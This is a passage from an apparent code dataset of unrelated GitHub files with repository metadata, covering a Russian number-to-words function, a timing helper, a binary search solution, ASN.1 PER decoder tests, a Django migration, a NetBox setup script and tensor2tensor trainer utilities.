    o = {10: 'десять', 20: 'двадцать', 30: 'тридцать', 40: 'сорок', 50: 'пятьдесят', 60: 'шестьдесят', 70: 'семьдесят', 80: 'восемьдесят', 90: 'девяносто'}
    s = {11: 'одиннадцать', 12: 'двенадцать', 13: 'тринадцать', 14: 'четырнадцать', 15: 'пятнадцать', 16: 'шестнадцать', 17: 'семнадцать', 18: 'восемнадцать', 19: 'девятнадцать'}
    n1 = n % 10
    n2 = n - n1
    if n < 10:
        return f.get(n)
    elif 10 < n < 20:
        return s.get(n)
    elif n >= 10 and n in o:
        return o.get(n)
    else:
        return o.get(n2) + ' ' + f.get(n1)
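A brief usage sketch for the function above (values chosen to exercise the units, teens and tens branches):
print(number_to_words(7))   # 'семь'
print(number_to_words(17))  # 'семнадцать'
print(number_to_words(42))  # 'сорок два'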
|
[
"noreply@github.com"
] |
rady1337.noreply@github.com
|
dc348cc551ade3d9067dc289fb237a4bbc259df2
|
209d49d62974e95d27a59a2ee3cfc48ae8f1007a
|
/format_time.py
|
ed4ea5a0271e20a26d55441bd446f6a4f8733fb5
|
[] |
no_license
|
87302380/BA
|
bc10be7b689feec83b37a9e82e21a1ea5d6754be
|
c51c256350948dda6923510e1fd669ecf69f4e4d
|
refs/heads/master
| 2020-07-14T18:56:08.052174
| 2019-10-23T21:18:59
| 2019-10-23T21:18:59
| 205,378,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
import time
def print_time(start):
    end = time.time()
    overall_time = end - start
    day = overall_time // (24 * 3600)
    overall_time = overall_time % (24 * 3600)
    hour = overall_time // 3600
    overall_time %= 3600
    minutes = overall_time // 60
    overall_time %= 60
    seconds = overall_time
    print("calculation time -> %d:%d:%d:%d" % (day, hour, minutes, seconds))
|
[
"87302380@qq.com"
] |
87302380@qq.com
|
fe93f12bb90a727d7242f36b744d28bce12e590c
|
cd78d84441e69c1fc40b6a6e9e235e7cf6882454
|
/python/35.search_insert_position.py
|
8d406dcdc7d9261226127b5e41452b8e2112cda3
|
[] |
no_license
|
buy/leetcode
|
53a12d4e0298284a5a2034c88353d0dc195aa66c
|
da0e834e3f2e3016396fffc96ef943ab9ec58ea4
|
refs/heads/master
| 2021-01-13T01:48:01.176632
| 2015-06-14T06:17:17
| 2015-06-14T06:17:17
| 31,863,627
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
# Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
# You may assume no duplicates in the array.
# Here are few examples.
# [1,3,5,6], 5 → 2
# [1,3,5,6], 2 → 1
# [1,3,5,6], 7 → 4
# [1,3,5,6], 0 → 0
class Solution:
    # @param {integer[]} nums
    # @param {integer} target
    # @return {integer}
    # 7:14
    def searchInsert(self, nums, target):
        if not nums or target is None:
            return -1
        low, high = 0, len(nums) - 1
        while low <= high:
            mid = (low + high) // 2  # integer division keeps mid an int on Python 3
            if nums[mid] == target:
                return mid
            elif nums[mid] < target:
                low = mid + 1
            else:
                high = mid - 1
        if nums[mid] > target:
            return mid
        else:
            return mid + 1
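A quick check of the solution against the four examples listed in the header comment:
s = Solution()
print(s.searchInsert([1, 3, 5, 6], 5))  # 2
print(s.searchInsert([1, 3, 5, 6], 2))  # 1
print(s.searchInsert([1, 3, 5, 6], 7))  # 4
print(s.searchInsert([1, 3, 5, 6], 0))  # 0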
|
[
"cliu@groupon.com"
] |
cliu@groupon.com
|
72f095e6d0df027da303f85e14998df4d3ce0645
|
5324708cd5cacc5c54cd010e504cbe3c8832d0d2
|
/asn1PERser/test/per/decoder/test_per_decode_sequence_of.py
|
454a489b6d6b8b5180ae31a1de274a578633965a
|
[
"MIT"
] |
permissive
|
erupikus/asn1PERser
|
0965143f12b3b924359452e8b21b9ed459815fd7
|
53ebac8b9a85b29846a64b80938dcd177a66d935
|
refs/heads/master
| 2023-08-09T07:23:52.265908
| 2023-07-14T12:50:22
| 2023-07-14T12:50:22
| 186,060,040
| 6
| 1
|
MIT
| 2023-07-14T12:50:23
| 2019-05-10T22:03:25
|
Python
|
UTF-8
|
Python
| false
| false
| 8,475
|
py
|
import pytest
from asn1PERser.codec.per.decoder import decode as per_decoder
from asn1PERser.test.per.encoder.test_per_encode_sequence_of import SCHEMA_constrained_seq_of_no_extension, \
SCHEMA_constrained_seq_of_extension_present, SCHEMA_no_constrains_sequence_of, DATA_seq_of
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_no_constrains_sequence_of(), '00',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=False, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '0103008707',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '020300870702FCB3',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '030300870702FCB30117',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '040300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_no_constrains_sequence_of(), '050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_no_constrains_sequence_of(), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_no_constrains_sequence_of_integer_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), '4003008707',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), '800300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=0, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '000300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '400300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), '800300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), 'C00300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_no_extension_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_no_extension(lb=1, ub=1), '03008707',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=1, ub=1), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=2), '0300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=2, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=3, ub=3), '0300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=3, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=4, ub=4), '0300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=4, ub=4), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_no_extension(lb=5, ub=5), '0300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_no_extension(lb=5, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_of_fixed_length_no_extension_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), '2003008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), '400300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=2), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '000300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '200300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '400300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), '600300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=2, ub=5), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
])
def test_constrained_sequence_of_with_extension_and_num_of_elems_is_within_extension_root_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
@pytest.mark.parametrize("schema, encoded, value", [
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '800103008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '80020300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), '80030300870702FCB30117',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=0, ub=0), i0_is=True, i1_is=True, i2_is=True, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), '80020300870702FCB3',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), i0_is=True, i1_is=True, i2_is=False, i3_is=False, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=1), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), '80040300870702FCB3011703030D40',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=False)),
(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=1, ub=3), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), '80050300870702FCB3011703030D400105',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), i0_is=True, i1_is=True, i2_is=True, i3_is=True, i4_is=True)),
(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), '800103008707',
DATA_seq_of(SCHEMA_constrained_seq_of_extension_present(lb=3, ub=4), i0_is=True, i1_is=False, i2_is=False, i3_is=False, i4_is=False)),
])
def test_constrained_sequence_of_with_extension_and_num_of_elems_is_not_within_extension_root_can_be_decoded(schema, encoded, value):
assert per_decoder(per_stream=bytearray.fromhex(encoded), asn1Spec=schema) == value
|
[
"erupikus@gmail.com"
] |
erupikus@gmail.com
|
be783fa8102eeb4d144b2d45dba042eaed4942e4
|
c493abe42e5942dd6a0f64a4a57c2ac7e57f3903
|
/shop/migrations/0001_initial.py
|
908735a3093cf19bb68630df3783dbb44a18bec0
|
[] |
no_license
|
riturajkush/Turbokart-Ecommerce-site
|
e4b7bd30430d38f0dc4d959224685b60f14ff76f
|
852eba399f0ed15ac62e546538c06cc739f807cf
|
refs/heads/main
| 2023-06-27T13:03:27.847751
| 2021-07-29T09:56:30
| 2021-07-29T09:56:30
| 390,667,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 3.1.1 on 2020-12-29 10:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('product_name', models.CharField(max_length=50)),
('desc', models.CharField(max_length=300)),
('pub_date', models.DateField()),
],
),
]
|
[
"kushwaha.rituraj62@gmail.com"
] |
kushwaha.rituraj62@gmail.com
|
2722ba01c870201beefb8bf2569d744c0740c6b6
|
7804b5c5bc44f437899ccb8e789477719666a472
|
/resources/prepare_netbox.py
|
26d39d9d5f446c0f349cc60acc5c9e8a560e0203
|
[
"MIT"
] |
permissive
|
jawhnycooke/nxos-netbox-sync
|
dc45bd0709ada392f4d9731068baa79ce1f6f464
|
7475fa4dc3718b7005c7af856264c4e7fb1af18e
|
refs/heads/master
| 2021-02-28T17:07:28.171852
| 2020-03-07T18:35:28
| 2020-03-07T18:35:28
| 245,715,874
| 1
| 0
|
MIT
| 2020-03-07T22:36:36
| 2020-03-07T22:36:35
| null |
UTF-8
|
Python
| false
| false
| 6,785
|
py
|
import pynetbox
import yaml
import os
data_file = "netbox_initial.yaml"
with open(data_file) as f:
data = yaml.safe_load(f.read())
nb_url = os.getenv("NETBOX_URL")
nb_token = os.getenv("NETBOX_TOKEN")
nb = pynetbox.api(url=nb_url, token=nb_token)
interface_modes = nb.dcim.choices()["interface:mode"]
interface_mode = {
"Access": 100,
"Tagged": 200,
"Tagged All": 300,
}
# sites:
for site in data["sites"]:
print(f"Creating or Updating Site {site['name']}")
nb_data = nb.dcim.sites.get(slug=site["slug"])
if not nb_data:
nb_data = nb.dcim.sites.create(name=site["name"], slug=site["slug"])
# manufacturers
for manufacturer in data["manufacturers"]:
print(f"Creating or Updating Manufacture {manufacturer['name']}")
nb_data = nb.dcim.manufacturers.get(slug=manufacturer["slug"])
if not nb_data:
nb_data = nb.dcim.manufacturers.create(name=manufacturer["name"], slug=manufacturer["slug"])
# device_types
for device_type in data["device_types"]:
print(f"Creating or Updating device_type {device_type['model']}")
nb_data = nb.dcim.device_types.get(slug=device_type["slug"])
if not nb_data:
nb_data = nb.dcim.device_types.create(
model=device_type["model"],
slug=device_type["slug"],
manufacturer=nb.dcim.manufacturers.get(slug=device_type["manufacturer_slug"]).id,
height=device_type["height"]
)
# device_roles
for device_role in data["device_roles"]:
print(f"Creating or Updating device_role {device_role['name']}")
nb_data = nb.dcim.device_roles.get(slug=device_role["slug"])
if not nb_data:
nb_data = nb.dcim.device_roles.create(
name=device_role["name"],
slug=device_role["slug"],
color=device_role["color"]
)
# platforms
for platform in data["platforms"]:
print(f"Creating or Updating platform {platform['name']}")
nb_data = nb.dcim.platforms.get(slug=platform["slug"])
if not nb_data:
nb_data = nb.dcim.platforms.create(
name=platform["name"],
slug=platform["slug"],
manufacturer=nb.dcim.manufacturers.get(slug=platform["manufacturer_slug"]).id,
)
# vrfs
for vrf in data["vrfs"]:
print(f"Creating or Updating vrf {vrf['name']}")
nb_data = nb.ipam.vrfs.get(rd=vrf["rd"])
if not nb_data:
nb_data = nb.ipam.vrfs.create(name=vrf["name"], rd=vrf["rd"])
# vlan-groups
for group in data["vlan_groups"]:
print(f"Creating or updating vlan-group {group['name']}")
nb_group = nb.ipam.vlan_groups.get(slug=group["slug"])
if not nb_group:
nb_group = nb.ipam.vlan_groups.create(
name = group["name"],
slug = group["slug"],
site=nb.dcim.sites.get(slug=group["site_slug"]).id,
)
# vlans
for vlan in group["vlans"]:
print(f"Creating or updating vlan {vlan['name']}")
nb_vlan = nb.ipam.vlans.get(
group_id=nb_group.id,
vid=vlan["vid"],
)
if not nb_vlan:
nb_vlan = nb.ipam.vlans.create(
group=nb_group.id,
site=nb_group.site.id,
name=vlan["name"],
vid=vlan["vid"],
description=vlan["description"],
)
if "prefix" in vlan.keys():
print(f"Configuring prefix {vlan['prefix']}")
nb_prefix = nb.ipam.prefixes.get(
vrf_id = nb.ipam.vrfs.get(rd=vlan["vrf"]).id,
site_id=nb_group.site.id,
vlan_vid=nb_vlan.vid,
)
if not nb_prefix:
# print(" Creating new prefix")
nb_prefix = nb.ipam.prefixes.create(
prefix=vlan["prefix"],
vrf=nb.ipam.vrfs.get(rd=vlan["vrf"]).id,
description=vlan["description"],
site=nb_group.site.id,
vlan=nb_vlan.id
)
# devices
for device in data["devices"]:
print(f"Creating or Updating device {device['name']}")
nb_device = nb.dcim.devices.get(name=device["name"])
if not nb_device:
nb_device = nb.dcim.devices.create(
name=device["name"],
manufacturer=nb.dcim.manufacturers.get(slug=device["manufacturer_slug"]).id,
site=nb.dcim.sites.get(slug=device["site_slug"]).id,
device_role=nb.dcim.device_roles.get(slug=device["device_role_slug"]).id,
device_type=nb.dcim.device_types.get(slug=device["device_types_slug"]).id,
)
for interface in device["interfaces"]:
print(f" Creating or updating interface {interface['name']}")
nb_interface = nb.dcim.interfaces.get(
device_id=nb_device.id,
name=interface["name"]
)
if not nb_interface:
nb_interface = nb.dcim.interfaces.create(
device=nb_device.id,
name=interface["name"],
)
if "description" in interface.keys():
nb_interface.description = interface["description"]
if "mgmt_only" in interface.keys():
nb_interface.mgmt_only = interface["mgmt_only"]
if "enabled" in interface.keys():
nb_interface.enabled = interface["enabled"]
if "mode" in interface.keys():
nb_interface.mode = interface_mode[interface["mode"]]
if "untagged_vlan" in interface.keys():
nb_interface.untagged_vlan = nb.ipam.vlans.get(
name=interface["untagged_vlan"]
).id
if "tagged_vlans" in interface.keys():
vl = [ nb.ipam.vlans.get(name=vlan_name).id for vlan_name in interface["tagged_vlans"] ]
# print("VLAN LIST")
# print(vl)
nb_interface.tagged_vlans = vl
if "ip_addresses" in interface.keys():
for ip in interface["ip_addresses"]:
print(f" Adding IP {ip['address']}")
nb_ipadd = nb.ipam.ip_addresses.get(
address = ip["address"],
vrf_id = nb.ipam.vrfs.get(rd=ip["vrf"]).id,
)
if not nb_ipadd:
nb_ipadd = nb.ipam.ip_addresses.create(
address = ip["address"],
vrf = nb.ipam.vrfs.get(rd=ip["vrf"]).id,
)
nb_ipadd.interface = nb_interface.id
nb_ipadd.save()
if "primary" in ip.keys():
nb_device.primary_ip4 = nb_ipadd.id
nb_device.save()
nb_interface.save()
|
[
"hank.preston@gmail.com"
] |
hank.preston@gmail.com
|
aeb851e7c40a6aac80481d0f78a38b4819faf2a5
|
a9758f67b329e0f8e3da80499e3f9bd85b12ea84
|
/tensor2tensor/utils/trainer_utils.py
|
e90e2dd103fe5f8571d40327965c8cfbc2784f83
|
[
"Apache-2.0"
] |
permissive
|
krenshaw2018/tensor2tensor
|
c9ed02c4c98ccc002a5d484777be6bf2adc230cf
|
8e2389021643774f81a3af643e55a856896aef5c
|
refs/heads/master
| 2020-03-24T05:12:57.945479
| 2018-06-15T10:59:14
| 2018-06-15T10:59:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,885
|
py
|
# coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for trainer binary."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
# Dependency imports
from tensor2tensor import models # pylint: disable=unused-import
from tensor2tensor.data_generators import all_problems # pylint: disable=unused-import
from tensor2tensor.utils import data_reader
from tensor2tensor.utils import decoding
from tensor2tensor.utils import devices
from tensor2tensor.utils import input_fn_builder
from tensor2tensor.utils import model_builder
from tensor2tensor.utils import registry
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import learn_runner
from tensorflow.python import debug
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_bool("registry_help", False,
"If True, logs the contents of the registry and exits.")
flags.DEFINE_bool("tfdbg", False,
"If True, use the TF debugger CLI on train/eval.")
flags.DEFINE_bool("export_saved_model", False,
"Whether to export a SavedModel for serving.")
flags.DEFINE_bool("dbgprofile", False,
"If True, record the timeline for chrome://tracing/.")
flags.DEFINE_string("model", "", "Which model to use.")
flags.DEFINE_string("hparams_set", "", "Which parameters to use.")
flags.DEFINE_string("hparams_range", "", "Parameters range.")
flags.DEFINE_string(
"hparams", "",
"""A comma-separated list of `name=value` hyperparameter values. This flag
is used to override hyperparameter settings either when manually selecting
hyperparameters or when using Vizier. If a hyperparameter setting is
specified by this flag then it must be a valid hyperparameter name for the
model.""")
flags.DEFINE_string("problems", "", "Dash separated list of problems to "
"solve.")
flags.DEFINE_string("data_dir", None, "Directory with training data.")
flags.DEFINE_integer("train_steps", 250000,
"The number of steps to run training for.")
flags.DEFINE_bool("eval_run_autoregressive", False,
"Run eval autoregressively where we condition on previous"
"generated output instead of the actual target.")
flags.DEFINE_bool("eval_use_test_set", False,
"Whether to use the '-test' data for EVAL (and PREDICT).")
flags.DEFINE_integer("keep_checkpoint_max", 20,
"How many recent checkpoints to keep.")
flags.DEFINE_bool("experimental_optimize_placement", False,
"Optimize ops placement with experimental session options.")
flags.DEFINE_integer("keep_checkpoint_every_n_hours", 10000,
"Number of hours between each checkpoint to be saved. "
"The default value 10,000 hours effectively disables it.")
flags.DEFINE_integer("save_checkpoints_secs", 0,
"Save checkpoints every this many seconds. "
"Default=0 means let tensorflow.contrib.learn.python.learn"
" decide, which is currently set to 600 = 10 minutes.")
flags.DEFINE_bool("log_device_placement", False,
"Whether to log device placement.")
# Distributed training flags
flags.DEFINE_integer("local_eval_frequency", 2000,
"Run evaluation every this steps during local training.")
flags.DEFINE_bool("locally_shard_to_cpu", False,
"Use CPU as a sharding device running locally. This allows "
"to test sharded model construction on a machine with 1 GPU.")
flags.DEFINE_bool("daisy_chain_variables", True,
"copy variables around in a daisy chain")
flags.DEFINE_bool("sync", False, "Sync compute on PS.")
flags.DEFINE_string("worker_job", "/job:localhost", "name of worker job")
flags.DEFINE_integer("worker_gpu", 1, "How many GPUs to use.")
flags.DEFINE_integer("worker_replicas", 1, "How many workers to use.")
flags.DEFINE_integer("worker_id", 0, "Which worker task are we.")
flags.DEFINE_float("worker_gpu_memory_fraction", 0.95,
"Fraction of GPU memory to allocate.")
flags.DEFINE_integer("ps_gpu", 0, "How many GPUs to use per ps.")
flags.DEFINE_string("gpu_order", "", "Optional order for daisy-chaining gpus."
" e.g. \"1 3 2 4\"")
flags.DEFINE_string("ps_job", "/job:ps", "name of ps job")
flags.DEFINE_integer("ps_replicas", 0, "How many ps replicas.")
# Decoding flags
flags.DEFINE_string(
"decode_hparams", "",
"Comma-separated list of name=value pairs to control decode behavior. "
"See decoding.decode_hparams for defaults.")
def make_experiment_fn(data_dir, model_name, train_steps, eval_steps):
"""Returns experiment_fn for learn_runner. Wraps create_experiment."""
def experiment_fn(run_config, hparams):
return create_experiment(
data_dir,
model_name=model_name,
train_steps=train_steps,
eval_steps=eval_steps,
hparams=hparams,
run_config=run_config)
return experiment_fn
def create_experiment(data_dir, model_name, train_steps, eval_steps, hparams,
run_config):
"""Create Experiment."""
estimator, input_fns = create_experiment_components(
data_dir=data_dir,
model_name=model_name,
hparams=hparams,
run_config=run_config)
train_monitors = []
eval_hooks = []
if FLAGS.tfdbg:
hook = debug.LocalCLIDebugHook()
train_monitors.append(hook)
eval_hooks.append(hook)
if FLAGS.dbgprofile:
# Recorded traces can be visualized with chrome://tracing/
# The memory/tensor lifetime is also profiled
train_monitors.append(
tf.contrib.hooks.ProfilerHook(
save_steps=10,
output_dir=run_config.model_dir,
show_dataflow=True,
show_memory=True,))
optional_kwargs = {}
if FLAGS.export_saved_model:
assert len(hparams.problem_instances) == 1
problem = hparams.problem_instances[0]
optional_kwargs["export_strategies"] = [
make_export_strategy(problem, hparams)
]
return tf.contrib.learn.Experiment(
estimator=estimator,
train_input_fn=input_fns[tf.estimator.ModeKeys.TRAIN],
eval_input_fn=input_fns[tf.estimator.ModeKeys.EVAL],
train_steps=train_steps,
eval_steps=eval_steps,
min_eval_frequency=FLAGS.local_eval_frequency,
train_monitors=train_monitors,
eval_hooks=eval_hooks,
eval_delay_secs=0,
**optional_kwargs)
def make_export_strategy(problem, hparams):
return tf.contrib.learn.make_export_strategy(
lambda: data_reader.serving_input_fn(problem, hparams), as_text=True)
def create_experiment_components(data_dir, model_name, hparams, run_config):
"""Constructs and returns Estimator and train/eval input functions."""
tf.logging.info("Creating experiment, storing model files in %s",
run_config.model_dir)
add_problem_hparams(hparams, FLAGS.problems)
# hparams batch_size is used as minibatch size instead of tokens in batch
batch_size = (hparams.use_fixed_batch_size and hparams.batch_size) or None
num_datashards = devices.data_parallelism().n
train_input_fn = input_fn_builder.build_input_fn(
mode=tf.estimator.ModeKeys.TRAIN,
hparams=hparams,
data_dir=data_dir,
num_datashards=num_datashards,
worker_replicas=FLAGS.worker_replicas,
worker_id=FLAGS.worker_id,
batch_size=batch_size)
eval_input_fn = input_fn_builder.build_input_fn(
mode=tf.estimator.ModeKeys.EVAL,
hparams=hparams,
data_dir=data_dir,
num_datashards=num_datashards,
worker_replicas=FLAGS.worker_replicas,
worker_id=FLAGS.worker_id,
dataset_split="test" if FLAGS.eval_use_test_set else None)
model_fn = model_builder.build_model_fn(
model_name,
problem_names=FLAGS.problems.split("-"),
train_steps=FLAGS.train_steps,
worker_id=FLAGS.worker_id,
worker_replicas=FLAGS.worker_replicas,
eval_run_autoregressive=FLAGS.eval_run_autoregressive,
decode_hparams=decoding.decode_hparams(FLAGS.decode_hparams))
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=run_config.model_dir,
params=hparams,
config=run_config)
return estimator, {
tf.estimator.ModeKeys.TRAIN: train_input_fn,
tf.estimator.ModeKeys.EVAL: eval_input_fn
}
def log_registry():
if FLAGS.registry_help:
tf.logging.info(registry.help_string())
sys.exit(0)
def add_problem_hparams(hparams, problems):
"""Add problem hparams for the problems."""
hparams.problems = []
hparams.problem_instances = []
for problem_name in problems.split("-"):
try:
problem = registry.problem(problem_name)
except LookupError:
all_problem_names = sorted(registry.list_problems())
error_lines = ["%s not in the set of supported problems:" % problem_name
] + all_problem_names
error_msg = "\n * ".join(error_lines)
raise LookupError(error_msg)
p_hparams = problem.get_hparams(hparams)
hparams.problem_instances.append(problem)
hparams.problems.append(p_hparams)
def save_metadata(output_dir, hparams):
"""Saves FLAGS and hparams to output_dir."""
# Save FLAGS in txt file
if hasattr(FLAGS, "flags_into_string"):
flags_str = FLAGS.flags_into_string()
t2t_flags_str = "\n".join([
"--%s=%s" % (f.name, f.value)
for f in FLAGS.flags_by_module_dict()[
"tensor2tensor.utils.trainer_utils"]
])
else:
flags_dict = FLAGS.__dict__["__flags"]
flags_str = "\n".join(
["--%s=%s" % (name, str(f)) for (name, f) in flags_dict.items()])
t2t_flags_str = None
flags_txt = os.path.join(output_dir, "flags.txt")
with tf.gfile.Open(flags_txt, "w") as f:
f.write(flags_str)
if t2t_flags_str:
t2t_flags_txt = os.path.join(output_dir, "flags_t2t.txt")
with tf.gfile.Open(t2t_flags_txt, "w") as f:
f.write(t2t_flags_str)
# Save hparams as hparams.json
hparams_fname = os.path.join(output_dir, "hparams.json")
with tf.gfile.Open(hparams_fname, "w") as f:
f.write(hparams.to_json())
def create_hparams(params_id, data_dir, passed_hparams=None):
"""Returns hyperparameters, including any flag value overrides.
If the hparams FLAG is set, then it will use any values specified in
hparams to override any individually-set hyperparameter. This logic
allows tuners to override hyperparameter settings to find optimal values.
Args:
params_id: which set of parameters to choose (must be in _PARAMS above).
data_dir: the directory containing the training data.
passed_hparams: command-line overrides for some hparams.
Returns:
The hyperparameters as a tf.contrib.training.HParams object.
"""
hparams = registry.hparams(params_id)()
hparams.add_hparam("data_dir", data_dir)
# Command line flags override any of the preceding hyperparameter values.
if passed_hparams:
hparams = hparams.parse(passed_hparams)
return hparams
def create_run_config(output_dir):
"""Create a RunConfig object."""
